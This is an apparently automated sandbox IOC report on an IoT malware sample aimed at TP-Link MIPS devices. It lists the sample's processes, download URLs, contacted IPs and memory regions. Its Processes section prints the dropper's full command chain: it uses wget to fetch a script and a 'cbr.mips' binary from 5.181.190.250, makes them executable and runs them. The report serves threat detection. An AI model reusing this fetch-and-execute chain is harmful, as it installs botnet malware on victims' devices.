Automated Malware Analysis IOC Report for

Files

File Path

Type

Processes

Path

Cmdline

Malicious

/bin/sh

/bin/sh -c "cd /tmp; rm -rf shk; wget http://5.181.190.250/sh ; chmod 777 sh; ./sh tplink; rm -rf shk"

/bin/sh

/usr/bin/rm

rm -rf shk

/bin/sh

/usr/bin/wget

wget http://5.181.190.250/sh

/bin/sh

/usr/bin/chmod

chmod 777 sh

/bin/sh

/bin/sh ./sh tplink

/bin/sh

/usr/bin/wget

wget http://5.181.190.250/cbrbinaries/cbr.mips -O cron.cbr

/bin/sh

/usr/bin/chmod

chmod 777 cron.cbr

/bin/sh

/tmp/cron.cbr

./cron.cbr tplink

/tmp/cron.cbr

There are 9 hidden processes, click here to show them.

URLs

Name

Malicious

http://$server_ip/cbrbinaries/$binname.$arch

unknown

http://5.181.190.250/cbrbinaries/cbr.mips

5.181.190.250

Details

Name:	http://5.181.190.250/cbrbinaries/cbr.mips
IP:	5.181.190.250
TargetID:	-1
From Memory:	false
Source:	network

Signature Hits	Behavior Group	Mitre Attack
Detected TCP or UDP traffic on non-standard ports	Networking	Non-Standard Port
Executes the "wget" command typically used for HTTP/S downloading	Networking, Persistence and Installation Behavior	Application Layer Protocol
HTTP GET or POST without a user agent	Networking
Connects to IPs without corresponding DNS lookups	Networking
Downloads files from webservers via HTTP	Networking	Application Layer Protocol Non-Application Layer Protocol Ingress Tool Transfer
Posts data to webserver	Networking	Application Layer Protocol Non-Application Layer Protocol

http://5.181.190.250/sh

5.181.190.250

Details

Name:	http://5.181.190.250/sh
IP:	5.181.190.250
TargetID:	-1
From Memory:	false
Source:	network

Signature Hits	Behavior Group	Mitre Attack
Detected TCP or UDP traffic on non-standard ports	Networking	Non-Standard Port
Executes the "wget" command typically used for HTTP/S downloading	Networking, Persistence and Installation Behavior	Application Layer Protocol
HTTP GET or POST without a user agent	Networking
Connects to IPs without corresponding DNS lookups	Networking
Downloads files from webservers via HTTP	Networking	Application Layer Protocol Non-Application Layer Protocol Ingress Tool Transfer
Posts data to webserver	Networking	Application Layer Protocol Non-Application Layer Protocol

http://schemas.xmlsoap.org/soap/encoding/

unknown

Details

Name:	http://schemas.xmlsoap.org/soap/encoding/
TargetID:	-1
From Memory:	true
Source:	cron.cbr, 6336.1.00007f6138400000.00007f6138412000.r-x.sdmp, cron.cbr.20.dr
Reputation:	high

Signature Hits	Behavior Group	Mitre Attack
HTTP GET or POST without a user agent	Networking
Posts data to webserver	Networking	Application Layer Protocol Non-Application Layer Protocol
URLs found in memory or binary data	Networking

http://www.cisco.com/go/ciscocp

unknown

http://schemas.xmlsoap.org/soap/envelope/

unknown

Details

Name:	http://schemas.xmlsoap.org/soap/envelope/
TargetID:	-1
From Memory:	true
Source:	cron.cbr, 6336.1.00007f6138400000.00007f6138412000.r-x.sdmp, cron.cbr.20.dr
Reputation:	high

Signature Hits	Behavior Group	Mitre Attack
HTTP GET or POST without a user agent	Networking
Posts data to webserver	Networking	Application Layer Protocol Non-Application Layer Protocol
URLs found in memory or binary data	Networking

IPs

Domain

Country

Malicious

66.42.126.49

unknown

United States

99.13.97.246

unknown

United States

166.43.38.193

unknown

United States

151.214.52.10

unknown

United States

121.0.38.93

unknown

Japan

41.127.73.188

unknown

South Africa

208.70.241.93

unknown

United States

207.209.196.6

unknown

United States

88.243.182.89

unknown

Turkey

24.173.15.173

unknown

United States

82.148.164.140

unknown

Norway

133.51.25.119

unknown

Japan

181.245.56.234

unknown

Colombia

88.245.81.179

unknown

Turkey

40.142.215.21

unknown

United States

121.66.15.11

unknown

Korea Republic of

143.10.148.33

unknown

United States

157.103.33.115

unknown

Japan

14.201.76.115

unknown

Australia

147.119.200.181

unknown

United Kingdom

196.151.15.191

unknown

Egypt

213.243.254.11

unknown

Italy

115.213.176.6

unknown

China

41.69.118.215

unknown

Egypt

134.199.41.76

unknown

Canada

80.24.212.160

unknown

Spain

120.76.101.207

unknown

China

85.253.5.107

unknown

Estonia

41.169.50.119

unknown

South Africa

202.229.187.60

unknown

Japan

97.73.172.151

unknown

United States

13.22.154.172

unknown

United States

46.102.232.165

unknown

Romania

134.95.128.34

unknown

Germany

212.250.45.87

unknown

United Kingdom

41.206.191.252

unknown

South Africa

74.153.89.132

unknown

United States

88.59.203.55

unknown

Italy

53.172.64.113

unknown

Germany

46.196.22.164

unknown

Turkey

181.111.119.93

unknown

Argentina

157.85.230.7

unknown

Australia

62.202.185.176

unknown

Switzerland

175.2.250.211

unknown

China

46.248.96.180

unknown

United Kingdom

165.196.136.118

unknown

United States

44.222.19.185

unknown

United States

27.77.16.98

unknown

Viet Nam

101.172.43.82

unknown

Australia

149.185.245.187

unknown

United Kingdom

39.3.14.236

unknown

Japan

47.18.20.104

unknown

United States

98.74.118.63

unknown

United States

60.252.194.183

unknown

China

202.12.205.234

unknown

Australia

8.155.218.243

unknown

Singapore

190.99.146.166

unknown

Colombia

89.184.235.9

unknown

Russian Federation

207.230.149.163

unknown

United States

220.243.135.176

unknown

China

77.0.12.250

unknown

Germany

85.158.231.105

unknown

Austria

82.35.105.250

unknown

United Kingdom

197.144.115.214

unknown

Morocco

46.202.131.116

unknown

Ukraine

136.239.11.109

unknown

United States

160.212.192.61

unknown

United States

196.143.151.43

unknown

Egypt

114.40.215.154

unknown

Taiwan; Republic of China (ROC)

156.158.50.25

unknown

Tanzania United Republic of

58.151.183.25

unknown

Korea Republic of

97.103.226.157

unknown

United States

212.209.129.206

unknown

Sweden

180.68.127.114

unknown

Korea Republic of

67.111.92.155

unknown

United States

153.220.62.68

unknown

Japan

156.246.150.198

unknown

Seychelles

69.37.231.56

unknown

United States

82.191.195.27

unknown

Italy

102.151.31.116

unknown

Zambia

195.80.226.0

unknown

Netherlands

44.17.33.182

unknown

United States

40.94.44.204

unknown

United States

70.62.35.72

unknown

United States

187.248.3.196

unknown

Mexico

219.129.112.27

unknown

China

27.68.234.53

unknown

Viet Nam

99.161.94.96

unknown

United States

179.122.106.89

unknown

Brazil

180.246.66.58

unknown

Indonesia

196.9.24.94

unknown

South Africa

196.100.121.82

unknown

Kenya

123.154.130.231

unknown

China

46.165.9.203

unknown

Russian Federation

186.24.223.230

unknown

Venezuela

205.127.158.33

unknown

United States

8.19.215.2

unknown

United States

107.144.127.44

unknown

United States

82.189.218.199

unknown

Italy

114.195.142.149

unknown

Japan

There are 90 hidden IPs, click here to show them.

Memdumps

Base Address

Regiontype

Protect

Malicious

7f6138412000

page execute read

565028e10000

page read and write

7f61c0eec000

page read and write

7f6138452000

page read and write

56502742f000

page read and write

7f61c0824000

page read and write

7f6138458000

page read and write

565028e30000

page read and write

56502541a000

page read and write

7f61b8021000

page read and write

7ffc4b538000

page read and write

7f61c0d76000

page read and write

7f61c01c5000

page read and write

7f61b8000000

page read and write

565025410000

page read and write

7f61c0e9f000

page read and write

7f61c0847000

page read and write

565027418000

page execute and read and write

7f61c0864000

page read and write

7f61c0b95000

page read and write

7f61c0483000

page read and write

7f61bf9bd000

page read and write

7f61c0ea7000

page read and write

7f61384e2000

page read and write

7f61c01d3000

page read and write

565025188000

page execute read

7ffc4b59a000

page execute read

There are 17 hidden memdumps, click here to show them.

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

IOC Report

Files

Processes

URLs

IPs

Memdumps